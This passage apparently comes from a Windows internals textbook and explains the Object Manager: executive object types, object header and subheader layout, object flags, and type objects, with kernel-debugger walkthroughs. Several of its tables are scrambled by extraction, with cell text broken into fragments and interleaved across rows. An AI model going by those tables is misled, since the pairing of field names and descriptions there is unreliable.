restart the simulation to the LdrpDoDebuggerBreak x86 function,
which caused an exception (managed through the native
Wow64RaiseException) notified to the debugger via the
Wow64pNotifyDebugger routine. With Windbg and the .effmach
command, you can effectively debug multiple contexts: native,
CHPE, and x86 code. Using the g @$exentry command, you can
move to the x86 entry point of Notepad and continue the debug
session of x86 code or the emulator itself. You can restart this
experiment also in different environments, debugging an app
located in SysArm32, for example.
Object Manager
As mentioned in Chapter 2 of Part 1, “System architecture,” Windows
implements an object model to provide consistent and secure access to the
various internal services implemented in the executive. This section describes
the Windows Object Manager, the executive component responsible for
creating, deleting, protecting, and tracking objects. The Object Manager
centralizes resource control operations that otherwise would be scattered
throughout the operating system. It was designed to meet the goals listed after
the experiment.
EXPERIMENT: Exploring the Object Manager
Throughout this section, you’ll find experiments that show you
how to peer into the Object Manager database. These experiments
use the following tools, which you should become familiar with if
you aren’t already:
■ WinObj (available from Sysinternals) displays the internal
Object Manager’s namespace and information about objects
(such as the reference count, the number of open handles,
security descriptors, and so forth). WinObjEx64, available
on GitHub, is a similar tool with more advanced
functionality and is open source but not endorsed or signed
by Microsoft.
■ Process Explorer and Handle from Sysinternals, as well as
Resource Monitor (introduced in Chapter 1 of Part 1)
display the open handles for a process. Process Hacker is
another tool that shows open handles and can show
additional details for certain kinds of objects.
■ The kernel debugger !handle extension displays the open
handles for a process, as does the Io.Handles data model
object underneath a Process such as @$curprocess.
WinObj and WinObjEx64 provide a way to traverse the
namespace that the Object Manager maintains. (As we’ll explain
later, not all objects have names.) Run either of them and examine
the layout, as shown in the figure.
The Windows Openfiles/query command, which lists local and
remote files currently opened in the system, requires that a
Windows global flag called maintain objects list be enabled. (See
the “Windows global flags” section later in Chapter 10 for more
details about global flags.) If you type Openfiles/Local, it tells you
whether the flag is enabled. You can enable it with the
Openfiles/Local ON command, but you still need to reboot the
system for the setting to take effect. Process Explorer, Handle, and
Resource Monitor do not require object tracking to be turned on
because they query all system handles and create a per-process
object list. Process Hacker queries per-process handles using a
mode-recent Windows API and also does not require the flag.
The Object Manager was designed to meet the following goals:
■ Provide a common, uniform mechanism for using system resources.
■ Isolate object protection to one location in the operating system to
ensure uniform and consistent object access policy.
■ Provide a mechanism to charge processes for their use of objects so
that limits can be placed on the usage of system resources.
■ Establish an object-naming scheme that can readily incorporate
existing objects, such as the devices, files, and directories of a file
system or other independent collections of objects.
■ Support the requirements of various operating system environments,
such as the ability of a process to inherit resources from a parent
process (needed by Windows and Subsystem for UNIX Applications)
and the ability to create case-sensitive file names (needed by
Subsystem for UNIX Applications). Although Subsystem for UNIX
Applications no longer exists, these facilities were also useful for the
later development of the Windows Subsystem for Linux.
■ Establish uniform rules for object retention (that is, for keeping an
object available until all processes have finished using it).
■ Provide the ability to isolate objects for a specific session to allow for
both local and global objects in the namespace.
■ Allow redirection of object names and paths through symbolic links
and allow object owners, such as the file system, to implement their
own type of redirection mechanisms (such as NTFS junction points).
Combined, these redirection mechanisms compose what is called
reparsing.
Internally, Windows has three primary types of objects: executive objects,
kernel objects, and GDI/User objects. Executive objects are objects
implemented by various components of the executive (such as the process
manager, memory manager, I/O subsystem, and so on). Kernel objects are a
more primitive set of objects implemented by the Windows kernel. These
objects are not visible to user-mode code but are created and used only
within the executive. Kernel objects provide fundamental capabilities, such
as synchronization, on which executive objects are built. Thus, many
executive objects contain (encapsulate) one or more kernel objects, as shown
in Figure 8-30.
Figure 8-30 Executive objects that contain kernel objects.
Note
The vast majority of GDI/User objects, on the other hand, belong to the
Windows subsystem (Win32k.sys) and do not interact with the kernel. For
this reason, they are outside the scope of this book, but you can get more
information on them from the Windows SDK. Two exceptions are the
Desktop and Windows Station User objects, which are wrapped in
executive objects, as well as the majority of DirectX objects (Shaders,
Surfaces, Compositions), which are also wrapped as executive objects.
Details about the structure of kernel objects and how they are used to
implement synchronization are given later in this chapter. The remainder of
this section focuses on how the Object Manager works and on the structure
of executive objects, handles, and handle tables. We just briefly describe how
objects are involved in implementing Windows security access checking;
Chapter 7 of Part 1 thoroughly covers that topic.
Executive objects
Each Windows environment subsystem projects to its applications a different
image of the operating system. The executive objects and object services are
primitives that the environment subsystems use to construct their own
versions of objects and other resources.
Executive objects are typically created either by an environment
subsystem on behalf of a user application or by various components of the
operating system as part of their normal operation. For example, to create a
file, a Windows application calls the Windows CreateFileW function,
implemented in the Windows subsystem DLL Kernelbase.dll. After some
validation and initialization, CreateFileW in turn calls the native Windows
service NtCreateFile to create an executive file object.
The set of objects an environment subsystem supplies to its applications
might be larger or smaller than the set the executive provides. The Windows
subsystem uses executive objects to export its own set of objects, many of
which correspond directly to executive objects. For example, the Windows
mutexes and semaphores are directly based on executive objects (which, in
turn, are based on corresponding kernel objects). In addition, the Windows
subsystem supplies named pipes and mailslots, resources that are based on
executive file objects. When leveraging Windows Subsystem for Linux
(WSL), its subsystem driver (Lxcore.sys) uses executive objects and services
as the basis for presenting Linux-style processes, pipes, and other resources
to its applications.
Table 8-15 lists the primary objects the executive provides and briefly
describes what they represent. You can find further details on executive
objects in the chapters that describe the related executive components (or in
the case of executive objects directly exported to Windows, in the Windows
API reference documentation). You can see the full list of object types by
running Winobj with elevated rights and navigating to the ObjectTypes
directory.
Table 8-15 Executive objects exposed to the Windows API
Object Type
Represents
Process
The virtual address space and control
information necessary for the execution
of a set of thread objects.
Thread
An executable entity within a process.
Job
A collection of processes manageable as
a single entity through the job.
Section
A region of shared memory (known as a
file-mapping object in Windows).
File
An instance of an opened file or an I/O
device, such as a pipe or socket.
Token
The security profile (security ID, user
rights, and so on) of a process or a
thread.
Event, KeyedEvent
An object with a persistent state
(signaled or not signaled) that can be
used for synchronization or notification.
The latter allows a global key to be used
to reference the underlying
synchronization primitive, avoiding
memory usage, making it usable in low-
memory conditions by avoiding an
allocation.
Semaphore
A counter that provides a resource gate
by allowing some maximum number of
threads to access the resources protected
by the semaphore.
Mutex
A synchronization mechanism used to
serialize access to a resource.
Timer, IRTimer
A mechanism to notify a thread when a
fixed period of time elapses. The latter
objects, called Idle Resilient Timers, are
used by UWP applications and certain
services to create timers that are not
affected by Connected Standby.
IoCompletion,
IoCompletionReserve
A method for threads to enqueue and
dequeue notifications of the completion
of I/O operations (known as an I/O
completion port in the Windows API).
The latter allows preallocation of the
port to combat low-memory situations.
Key
A mechanism to refer to data in the
registry. Although keys appear in the
Object Manager namespace, they are
managed by the configuration manager,
in a way like that in which file objects
are managed by file system drivers. Zero
or more key values are associated with a
key object; key values contain data
about the key.
Directory
A virtual directory in the Object
Manager’s namespace responsible for
containing other objects or object
directories.
SymbolicLink
A virtual name redirection link between
an object in the namespace and another
object, such as C:, which is a symbolic
link to \Device\HarddiskVolumeN.
TpWorkerFactory
A collection of threads assigned to
perform a specific set of tasks. The
kernel can manage the number of work
items that will be performed on the
queue, how many threads should be
responsible for the work, and dynamic
creation and termination of worker
threads, respecting certain limits the
caller can set. Windows exposes the
worker factory object through thread
pools.
TmRm (Resource Manager),
TmTx (Transaction), TmTm
(Transaction Manager),
TmEn (Enlistment)
Objects used by the Kernel Transaction
Manager (KTM) for various
transactions and/or enlistments as part
of a resource manager or transaction
manager. Objects can be created
through the CreateTransactionManager,
CreateResourceManager,
CreateTransaction, and
CreateEnlistment APIs.
RegistryTransaction
Object used by the low-level lightweight
registry transaction API that does not
leverage the full KTM capabilities but
still allows simple transactional access
to registry keys.
WindowStation
An object that contains a clipboard, a set
of global atoms, and a group of Desktop
objects.
Desktop
An object contained within a window
station. A desktop has a logical display
surface and contains windows, menus,
and hooks.
PowerRequest
An object associated with a thread that
executes, among other things, a call to
SetThreadExecutionState to request a
given power change, such as blocking
sleeps (due to a movie being played, for
example).
EtwConsumer
Represents a connected ETW real-time
consumer that has registered with the
StartTrace API (and can call
ProcessTrace to receive the events on
the object queue).
CoverageSampler
Created by ETW when enabling code
coverage tracing on a given ETW
session.
EtwRegistration
Represents the registration object
associated with a user-mode (or kernel-
mode) ETW provider that registered
with the EventRegister API.
ActivationObject
Represents the object that tracks
foreground state for window handles
that are managed by the Raw Input
Manager in Win32k.sys.
ActivityReference
Tracks processes managed by the
Process Lifetime Manager (PLM) and
that should be kept awake during
Connected Standby scenarios.
ALPC Port
Used mainly by the Remote Procedure
Call (RPC) library to provide Local
RPC (LRPC) capabilities when using
the ncalrpc transport. Also available to
internal services as a generic IPC
mechanism between processes and/or
the kernel.
Composition,
DxgkCompositionObject,
DxgkCurrentDxgProcessObj
ect,
DxgkDisplayManagerObject
, DxgkSharedBundleObject,
DxgkSharedKeyedMutexObj
ect,
DxgkShartedProtectedSessio
nObject,
DgxkSharedResource,
DxgkSwapChainObject,
DxgkSharedSyncObject
Used by DirectX 12 APIs in user-space
as part of advanced shader and GPGPU
capabilities, these executive objects
wrap the underlying DirectX handle(s).
CoreMessaging
Represents a CoreMessaging IPC object
that wraps an ALPC port with its own
customized namespace and capabilities;
used primarily by the modern Input
Manager but also exposed to any
MinUser component on WCOS systems.
EnergyTracker
Exposed to the User Mode Power
(UMPO) service to allow tracking and
aggregation of energy usage across a
variety of hardware and associating it on
a per-application basis.
FilterCommunicationPort,
FilterConnectionPort
Underlying objects backing the IRP-
based interface exposed by the Filter
Manager API, which allows
communication between user-mode
services and applications, and the mini-
filters that are managed by Filter
Manager, such as when using
FilterSendMessage.
Partition
Enables the memory manager, cache
manager, and executive to treat a region
of physical memory as unique from a
management perspective vis-à-vis the
rest of system RAM, giving it its own
instance of management threads,
capabilities, paging, caching, etc. Used
by Game Mode and Hyper-V, among
others, to better distinguish the system
from the underlying workloads.
Profile
Used by the profiling API that allows
capturing time-based buckets of
execution that track anything from the
Instruction Pointer (IP) all the way to
low-level processor caching information
stored in the PMU counters.
RawInputManager
Represents the object that is bound to an
HID device such as a mouse, keyboard,
or tablet and allows reading and
managing the window manager input
that is being received by it. Used by
modern UI management code such as
when Core Messaging is involved.
Session
Object that represents the memory
manager’s view of an interactive user
session, as well as tracks the I/O
manager’s notifications around
connect/disconnect/logoff/logon for
third-party driver usage.
Terminal
Only enabled if the terminal thermal
manager (TTM) is enabled, this
represents a user terminal on a device,
which is managed by the user mode
power manager (UMPO).
TerminalEventQueue
Only enabled on TTM systems, like the
preceding object type, this represents
events being delivered to a terminal on a
device, which UMPO communicates
with the kernel’s power manager about.
UserApcReserve
Similar to IoCompletionReserve in that
it allows precreating a data structure to
be reused during low-memory
conditions, this object encapsulates an
APC Kernel Object (KAPC) as an
executive object.
WaitCompletionPacket
Used by the new asynchronous wait
capabilities that were introduced in the
user-mode Thread Pool API, this object
wraps the completion of a dispatcher
wait as an I/O packet that can be
delivered to an I/O completion port.
WmiGuid
Used by the Windows Management
Instrumentation (WMI) APIs when
opening WMI Data Blocks by GUID,
either from user mode or kernel mode,
such as with IoWMIOpenBlock.
Note
The executive implements a total of about 69 object types (depending on
the Windows version). Some of these objects are for use only by the
executive component that defines them and are not directly accessible by
Windows APIs. Examples of these objects include Driver, Callback, and
Adapter.
Note
Because Windows NT was originally supposed to support the OS/2
operating system, the mutex had to be compatible with the existing design
of OS/2 mutual-exclusion objects, a design that required that a thread be
able to abandon the object, leaving it inaccessible. Because this behavior
was considered unusual for such an object, another kernel object—the
mutant—was created. Eventually, OS/2 support was dropped, and the
object became used by the Windows 32 subsystem under the name mutex
(but it is still called mutant internally).
Object structure
As shown in Figure 8-31, each object has an object header, an object body,
and potentially, an object footer. The Object Manager controls the object
headers and footer, whereas the owning executive components control the
object bodies of the object types they create. Each object header also contains
an index to a special object, called the type object, that contains information
common to each instance of the object. Additionally, up to eight optional
subheaders exist: The name information header, the quota information
header, the process information header, the handle information header, the
audit information header, the padding information header, the extended
information header, and the creator information header. If the extended
information header is present, this means that the object has a footer, and the
header will contain a pointer to it.
Figure 8-31 Structure of an object.
Object headers and bodies
The Object Manager uses the data stored in an object’s header to manage
objects without regard to their type. Table 8-16 briefly describes the object
header fields, and Table 8-17 describes the fields found in the optional object
subheaders.
Table 8-16 Object header fields
F
ie
l
d
Purpose
H
a
n
dl
e
c
o
u
nt
Maintains a count of the number of currently opened handles to the
object.
P
oi
nt
er
c
o
u
nt
Maintains a count of the number of references to the object
(including one reference for each handle), and the number of usage
references for each handle (up to 32 for 32-bit systems, and 32,768
for 64-bit systems). Kernel-mode components can reference an
object by pointer without using a handle.
S
e
c
Determines who can use the object and what they can do with it.
Note that unnamed objects, by definition, cannot have security.
u
ri
ty
d
e
s
cr
ip
to
r
O
bj
e
ct
ty
p
e
in
d
e
x
Contains the index to a type object that contains attributes common
to objects of this type. The table that stores all the type objects is
ObTypeIndexTable. Due to a security mitigation, this index is
XOR’ed with a dynamically generated sentinel value stored in
ObHeaderCookie and the bottom 8 bits of the address of the object
header itself.
I
n
f
o
m
a
s
k
Bitmask describing which of the optional subheader structures
described in Table 8-17 are present, except for the creator
information subheader, which, if present, always precedes the
object. The bitmask is converted to a negative offset by using the
ObpInfoMaskToOffset table, with each subheader being associated
with a 1-byte index that places it relative to the other subheaders
present.
F
la
g
s
Characteristics and object attributes for the object. See Table 8-20
for a list of all the object flags.
L
o
c
k
Per-object lock used when modifying fields belonging to this object
header or any of its subheaders.
T
ra
c
e
F
la
g
s
Additional flags specifically related to tracing and debugging
facilities, also described in Table 8-20.
O
bj
e
ct
C
re
at
e
I
n
f
o
Ephemeral information about the creation of the object that is
stored until the object is fully inserted into the namespace. This
field converts into a pointer to the Quota Block after creation.
In addition to the object header, which contains information that applies to
any kind of object, the subheaders contain optional information regarding
specific aspects of the object. Note that these structures are located at a
variable offset from the start of the object header, the value of which depends
on the number of subheaders associated with the main object header (except,
as mentioned earlier, for creator information). For each subheader that is
present, the InfoMask field is updated to reflect its existence. When the
Object Manager checks for a given subheader, it checks whether the
corresponding bit is set in the InfoMask and then uses the remaining bits to
select the correct offset into the global ObpInfoMaskToOffset table, where it
finds the offset of the subheader from the start of the object header.
These offsets exist for all possible combinations of subheader presence,
but because the subheaders, if present, are always allocated in a fixed,
constant order, a given header will have only as many possible locations as
the maximum number of subheaders that precede it. For example, because
the name information subheader is always allocated first, it has only one
possible offset. On the other hand, the handle information subheader (which
is allocated third) has three possible locations because it might or might not
have been allocated after the quota subheader, itself having possibly been
allocated after the name information. Table 8-17 describes all the optional
object subheaders and their locations. In the case of creator information, a
value in the object header flags determines whether the subheader is present.
(See Table 8-20 for information about these flags.)
Table 8-17 Optional object subheaders
Na
me
Purpose
B
it
Offset
Cr
eat
or
inf
or
ma
tio
n
Links the object into a list for all the objects of the
same type and records the process that created the
object, along with a back trace.
0
(
0
x
1
)
ObpInf
oMask
ToOffs
et[0])
Na
me
inf
or
ma
Contains the object name, responsible for making
an object visible to other processes for sharing, and
a pointer to the object directory, which provides the
hierarchical structure in which the object names are
stored.
1
(
0
x
2
)
ObpInf
oMask
ToOffs
et[Info
Mask
& 0x3]
tio
n
Ha
ndl
e
inf
or
ma
tio
n
Contains a database of entries (or just a single
entry) for a process that has an open handle to the
object (along with a per-process handle count).
2
(
0
x
4
)
ObpInf
oMask
ToOffs
et[Info
Mask
& 0x7]
Qu
ota
inf
or
ma
tio
n
Lists the resource charges levied against a process
when it opens a handle to the object.
3
(
0
x
8
)
ObpInf
oMask
ToOffs
et[Info
Mask
&
0xF]
Pro
ces
s
inf
or
ma
tio
n
Contains a pointer to the owning process if this is
an exclusive object. More information on exclusive
objects follows later in the chapter.
4
(
0
x
1
0
)
ObpInf
oMask
ToOffs
et[Info
Mask
&
0x1F]
Au
dit
inf
Contains a pointer to the original security descriptor
that was used when first creating the object. This is
used for File Objects when auditing is enabled to
guarantee consistency.
5
(
0
x
ObpInf
oMask
ToOffs
et[Info
or
ma
tio
n
2
0
)
Mask
&
0x3F]
Ext
en
de
d
inf
or
ma
tio
n
Stores the pointer to the object footer for objects
that require one, such as File and Silo Context
Objects.
6
(
0
x
4
0
)
ObpInf
oMask
ToOffs
et[Info
Mask
&
0x7F]
Pa
ddi
ng
inf
or
ma
tio
n
Stores nothing—empty junk space—but is used to
align the object body on a cache boundary, if this
was requested.
7
(
0
x
8
0
)
ObpInf
oMask
ToOffs
et[Info
Mask
&
0xFF]
Each of these subheaders is optional and is present only under certain
conditions, either during system boot or at object creation time. Table 8-18
describes each of these conditions.
Table 8-18 Conditions required for presence of object subheaders
Na
me
Condition
Cr
The object type must have enabled the maintain type list flag.
eat
or
inf
or
ma
tio
n
Driver objects have this flag set if the Driver Verifier is enabled.
However, enabling the maintain object type list global flag
(discussed earlier) enables this for all objects, and Type objects
always have the flag set.
Na
me
inf
or
ma
tio
n
The object must have been created with a name.
Ha
ndl
e
inf
or
ma
tio
n
The object type must have enabled the maintain handle count flag.
File objects, ALPC objects, WindowStation objects, and Desktop
objects have this flag set in their object type structure.
Qu
ota
inf
or
ma
tio
n
The object must not have been created by the initial (or idle)
system process.
Pro
ces
s
The object must have been created with the exclusive object flag.
(See Table 8-20 for information about object flags.)
inf
or
ma
tio
n
Au
dit
Inf
or
ma
tio
n
The object must be a File Object, and auditing must be enabled for
file object events.
Ext
en
de
d
inf
or
ma
tio
n
The object must need a footer, either due to handle revocation
information (used by File and Key objects) or to extended user
context info (used by Silo Context objects).
Pa
ddi
ng
Inf
or
ma
tio
n
The object type must have enabled the cache aligned flag. Process
and thread objects have this flag set.
As indicated, if the extended information header is present, an object
footer is allocated at the tail of the object body. Unlike object subheaders, the
footer is a statically sized structure that is preallocated for all possible footer
types. There are two such footers, described in Table 8-19.
Table 8-19 Conditions required for presence of object footer
Name
Condition
Handle
Revocati
on
Informat
ion
The object must be created with ObCreateObjectEx, passing
in AllowHandleRevocation in the
OB_EXTENDED_CREATION_INFO structure. File and Key
objects are created this way.
Extende
d User
Informat
ion
The object must be created with ObCreateObjectEx, passing
in AllowExtendedUserInfo in the
OB_EXTENDED_CREATION_INFO structure. Silo Context
objects are created this way.
Finally, a number of attributes and/or flags determine the behavior of the
object during creation time or during certain operations. These flags are
received by the Object Manager whenever any new object is being created, in
a structure called the object attributes. This structure defines the object name,
the root object directory where it should be inserted, the security descriptor
for the object, and the object attribute flags. Table 8-20 lists the various flags
that can be associated with an object.
Table 8-20 Object flags
Attrib
utes
Flag
He
ade
r
Fla
g
Bit
Purpose
OBJ_I
NHERI
Sav
ed
Determines whether the handle to the object will be
inherited by child processes and whether a process can
T
in
the
han
dle
tabl
e
entr
y
use DuplicateHandle to make a copy.
OBJ_P
ERMA
NENT
Per
ma
nen
tOb
ject
Defines object retention behavior related to reference
counts, described later.
OBJ_E
XCLUS
IVE
Exc
lusi
ve
Obj
ect
Specifies that the object can be used only by the
process that created it.
OBJ_C
ASE_I
NSENS
ITIVE
Not
stor
ed,
use
d at
run
tim
e
Specifies that lookups for this object in the namespace
should be case insensitive. It can be overridden by the
case insensitive flag in the object type.
OBJ_O
PENIF
Not
stor
ed,
use
d at
run
Specifies that a create operation for this object name
should result in an open, if the object exists, instead of
a failure.
tim
e
OBJ_O
PENLI
NK
Not
stor
ed,
use
d at
run
tim
e
Specifies that the Object Manager should open a
handle to the symbolic link, not the target.
OBJ_K
ERNEL
_HAN
DLE
Ker
nel
Obj
ect
Specifies that the handle to this object should be a
kernel handle (more on this later).
OBJ_F
ORCE
_ACCE
SS_CH
ECK
Not
stor
ed,
use
d at
run
tim
e
Specifies that even if the object is being opened from
kernel mode, full access checks should be performed.
OBJ_K
ERNEL
_EXCL
USIVE
Ker
nel
Onl
yA
cce
ss
Disables any user-mode process from opening a handle
to the object; used to protect the
\Device\PhysicalMemory and \Win32kSessionGlobals
section objects.
OBJ_I
GNOR
E_IMP
Not
stor
ed,
Indicates that when a token is being impersonated, the
DOS Device Map of the source user should not be
used, and the current impersonating process’s DOS
ERSO
NATE
D_DE
VICEM
AP
use
d at
run
tim
e
Device Map should be maintained for object lookup.
This is a security mitigation for certain types of file-
based redirection attacks.
OBJ_D
ONT_R
EPARS
E
Not
stor
ed,
use
d at
run
tim
e
Disables any kind of reparsing situation (symbolic
links, NTFS reparse points, registry key redirection),
and returns
STATUS_REPARSE_POINT_ENCOUNTERED if any
such situation occurs. This is a security mitigation for
certain types of path redirection attacks.
N/A
Def
ault
Sec
urit
yQ
uot
a
Specifies that the object’s security descriptor is using
the default 2 KB quota.
N/A
Sin
gle
Ha
ndl
eEn
try
Specifies that the handle information subheader
contains only a single entry and not a database.
N/A
Ne
wO
bje
ct
Specifies that the object has been created but not yet
inserted into the object namespace.
N/A
Del
Specifies that the object is not being deleted through
ete
dIn
line
the deferred deletion worker thread but rather inline
through a call to ObDereferenceObject(Ex).
Note
When an object is being created through an API in the Windows
subsystem (such as CreateEvent or CreateFile), the caller does not
specify any object attributes—the subsystem DLL performs the work
behind the scenes. For this reason, all named objects created through
Win32 go in the BaseNamedObjects directory, either the global or per-
session instance, because this is the root object directory that
Kernelbase.dll specifies as part of the object attributes structure. More
information on BaseNamedObjects and how it relates to the per-session
namespace follows later in this chapter.
In addition to an object header, each object has an object body whose
format and contents are unique to its object type; all objects of the same type
share the same object body format. By creating an object type and supplying
services for it, an executive component can control the manipulation of data
in all object bodies of that type. Because the object header has a static and
well-known size, the Object Manager can easily look up the object header for
an object simply by subtracting the size of the header from the pointer of the
object. As explained earlier, to access the subheaders, the Object Manager
subtracts yet another well-known value from the pointer of the object header.
For the footer, the extended information subheader is used to find the pointer
to the object footer.
Because of the standardized object header, footer, and subheader
structures, the Object Manager is able to provide a small set of generic
services that can operate on the attributes stored in any object header and can
be used on objects of any type (although some generic services don’t make
sense for certain objects). These generic services, some of which the
Windows subsystem makes available to Windows applications, are listed in
Table 8-21.
Table 8-21 Generic object services
Service
Purpose
Close
Closes a handle to an object, if allowed (more on this later).
Duplicat
e
Shares an object by duplicating a handle and giving it to
another process (if allowed, as described later).
Inheritan
ce
If a handle is marked as inheritable, and a child process is
spawned with handle inheritance enabled, this behaves like
duplication for those handles.
Make
permane
nt/tempo
rary
Changes the retention of an object (described later).
Query
object
Gets information about an object’s standard attributes and
other details managed at the Object Manager level.
Query
security
Gets an object’s security descriptor.
Set
security
Changes the protection on an object.
Wait for
a single
object
Associates a wait block with one object, which can then
synchronize a thread’s execution or be associated with an
I/O completion port through a wait completion packet.
Signal
an object
Signals the object, performing wake semantics on the
dispatcher object backing it, and then waits on a single
and wait
for
another
object as per above. The wake/wait operation is done
atomically from the scheduler’s perspective..
Wait for
multiple
objects
Associates a wait block with one or more objects, up to a
limit (64), which can then synchronize a thread’s execution
or be associated with an I/O completion port through a wait
completion packet.
Although all of these services are not generally implemented by most
object types, they typically implement at least create, open, and basic
management services. For example, the I/O system implements a create file
service for its file objects, and the process manager implements a create
process service for its process objects.
However, some objects may not directly expose such services and could be
internally created as the result of some user operation. For example, when
opening a WMI Data Block from user mode, a WmiGuid object is created,
but no handle is exposed to the application for any kind of close or query
services. The key thing to understand, however, is that there is no single
generic creation routine.
Such a routine would have been quite complicated because the set of
parameters required to initialize a file object, for example, differs markedly
from what is required to initialize a process object. Also, the Object Manager
would have incurred additional processing overhead each time a thread called
an object service to determine the type of object the handle referred to and to
call the appropriate version of the service.
Type objects
Object headers contain data that is common to all objects but that can take on
different values for each instance of an object. For example, each object has a
unique name and can have a unique security descriptor. However, objects
also contain some data that remains constant for all objects of a particular
type. For example, you can select from a set of access rights specific to a type
of object when you open a handle to objects of that type. The executive
supplies terminate and suspend access (among others) for thread objects and
read, write, append, and delete access (among others) for file objects.
Another example of an object-type-specific attribute is synchronization,
which is described shortly.
To conserve memory, the Object Manager stores these static, object-type-
specific attributes once when creating a new object type. It uses an object of
its own, a type object, to record this data. As Figure 8-32 illustrates, if the
object-tracking debug flag (described in the “Windows global flags” section
later in this chapter) is set, a type object also links together all objects of the
same type (in this case, the process type), allowing the Object Manager to
find and enumerate them, if necessary. This functionality takes advantage of
the creator information subheader discussed previously.
Figure 8-32 Process objects and the process type object.
EXPERIMENT: Viewing object headers and type
objects
You can look at the process object type data structure in the kernel
debugger by first identifying a process object with the dx
@$cursession.Processes debugger data model command:
Click here to view code image
lkd> dx -r0 &@$cursession.Processes[4].KernelObject
&@$cursession.Processes[4].KernelObject :
0xffff898f0327d300 [Type: _EPROCESS *]
Then execute the !object command with the process object
address as the argument:
Click here to view code image
lkd> !object 0xffff898f0327d300
Object: ffff898f0327d300 Type: (ffff898f032954e0) Process
ObjectHeader: ffff898f0327d2d0 (new version)
HandleCount: 6 PointerCount: 215645
Notice that on 32-bit Windows, the object header starts 0x18 (24
decimal) bytes prior to the start of the object body, and on 64-bit
Windows, it starts 0x30 (48 decimal) bytes prior—the size of the
object header itself. You can view the object header with this
command:
Click here to view code image
lkd> dx (nt!_OBJECT_HEADER*)0xffff898f0327d2d0
(nt!_OBJECT_HEADER*)0xffff898f0327d2d0 :
0xffff898f0327d2d0 [Type: _OBJECT_HEADER *]
[+0x000] PointerCount : 214943 [Type: __int64]
[+0x008] HandleCount : 6 [Type: __int64]
[+0x008] NextToFree : 0x6 [Type: void *]
[+0x010] Lock [Type: _EX_PUSH_LOCK]
[+0x018] TypeIndex : 0x93 [Type: unsigned char]
[+0x019] TraceFlags : 0x0 [Type: unsigned char]
[+0x019 ( 0: 0)] DbgRefTrace : 0x0 [Type: unsigned
char]
[+0x019 ( 1: 1)] DbgTracePermanent : 0x0 [Type: unsigned
char]
[+0x01a] InfoMask : 0x80 [Type: unsigned char]
[+0x01b] Flags : 0x2 [Type: unsigned char]
[+0x01b ( 0: 0)] NewObject : 0x0 [Type: unsigned
char]
[+0x01b ( 1: 1)] KernelObject : 0x1 [Type: unsigned
char]
[+0x01b ( 2: 2)] KernelOnlyAccess : 0x0 [Type: unsigned
char]
[+0x01b ( 3: 3)] ExclusiveObject : 0x0 [Type: unsigned
char]
[+0x01b ( 4: 4)] PermanentObject : 0x0 [Type: unsigned
char]
[+0x01b ( 5: 5)] DefaultSecurityQuota : 0x0 [Type:
unsigned char]
[+0x01b ( 6: 6)] SingleHandleEntry : 0x0 [Type: unsigned
char]
[+0x01b ( 7: 7)] DeletedInline : 0x0 [Type: unsigned
char]
[+0x01c] Reserved : 0xffff898f [Type: unsigned
long]
[+0x020] ObjectCreateInfo : 0xfffff8047ee6d500 [Type:
_OBJECT_CREATE_INFORMATION *]
[+0x020] QuotaBlockCharged : 0xfffff8047ee6d500 [Type:
void *]
[+0x028] SecurityDescriptor : 0xffffc704ade03b6a [Type:
void *]
[+0x030] Body [Type: _QUAD]
ObjectType : Process
UnderlyingObject [Type: _EPROCESS]
Now look at the object type data structure by copying the pointer
that !object showed you earlier:
Click here to view code image
lkd> dx (nt!_OBJECT_TYPE*)0xffff898f032954e0
(nt!_OBJECT_TYPE*)0xffff898f032954e0 :
0xffff898f032954e0 [Type: _OBJECT_TYPE *]
[+0x000] TypeList [Type: _LIST_ENTRY]
[+0x010] Name : "Process" [Type:
_UNICODE_STRING]
[+0x020] DefaultObject : 0x0 [Type: void *]
[+0x028] Index : 0x7 [Type: unsigned char]
[+0x02c] TotalNumberOfObjects : 0x2e9 [Type: unsigned
long]
[+0x030] TotalNumberOfHandles : 0x15a1 [Type: unsigned
long]
[+0x034] HighWaterNumberOfObjects : 0x2f9 [Type:
unsigned long]
[+0x038] HighWaterNumberOfHandles : 0x170d [Type:
unsigned long]
[+0x040] TypeInfo [Type:
_OBJECT_TYPE_INITIALIZER]
[+0x0b8] TypeLock [Type: _EX_PUSH_LOCK]
[+0x0c0] Key : 0x636f7250 [Type: unsigned
long]
[+0x0c8] CallbackList [Type: _LIST_ENTRY]
The output shows that the object type structure includes the
name of the object type, tracks the total number of active objects of
that type, and tracks the peak number of handles and objects of that
type. The CallbackList also keeps track of any Object Manager
filtering callbacks that are associated with this object type. The
TypeInfo field stores the data structure that keeps attributes, flags,
and settings common to all objects of the object type as well as
pointers to the object type’s custom methods, which we’ll describe
shortly:
Click here to view code image
lkd> dx ((nt!_OBJECT_TYPE*)0xffff898f032954e0)->TypeInfo
((nt!_OBJECT_TYPE*)0xffff898f032954e0)->TypeInfo
[Type: _OBJECT_TYPE_INITIALIZER]
[+0x000] Length : 0x78 [Type: unsigned short]
[+0x002] ObjectTypeFlags : 0xca [Type: unsigned short]
[+0x002 ( 0: 0)] CaseInsensitive : 0x0 [Type: unsigned
char]
[+0x002 ( 1: 1)] UnnamedObjectsOnly : 0x1 [Type:
unsigned char]
[+0x002 ( 2: 2)] UseDefaultObject : 0x0 [Type: unsigned
char]
[+0x002 ( 3: 3)] SecurityRequired : 0x1 [Type: unsigned
char]
[+0x002 ( 4: 4)] MaintainHandleCount : 0x0 [Type:
unsigned char]
[+0x002 ( 5: 5)] MaintainTypeList : 0x0 [Type: unsigned
char]
[+0x002 ( 6: 6)] SupportsObjectCallbacks : 0x1 [Type:
unsigned char]
[+0x002 ( 7: 7)] CacheAligned : 0x1 [Type: unsigned
char]
[+0x003 ( 0: 0)] UseExtendedParameters : 0x0 [Type:
unsigned char]
[+0x003 ( 7: 1)] Reserved : 0x0 [Type: unsigned
char]
[+0x004] ObjectTypeCode : 0x20 [Type: unsigned long]
[+0x008] InvalidAttributes : 0xb0 [Type: unsigned long]
[+0x00c] GenericMapping [Type: _GENERIC_MAPPING]
[+0x01c] ValidAccessMask : 0x1fffff [Type: unsigned
long]
[+0x020] RetainAccess : 0x101000 [Type: unsigned
long]
[+0x024] PoolType : NonPagedPoolNx (512) [Type:
_POOL_TYPE]
[+0x028] DefaultPagedPoolCharge : 0x1000 [Type: unsigned
long]
[+0x02c] DefaultNonPagedPoolCharge : 0x8d8 [Type:
unsigned long]
[+0x030] DumpProcedure : 0x0 [Type: void (__cdecl*)
(void *,_OBJECT_DUMP_CONTROL *)]
[+0x038] OpenProcedure : 0xfffff8047f062f40 [Type:
long (__cdecl*)
(_OB_OPEN_REASON,char,_EPROCESS *,void
*,unsigned long *,unsigned long)]
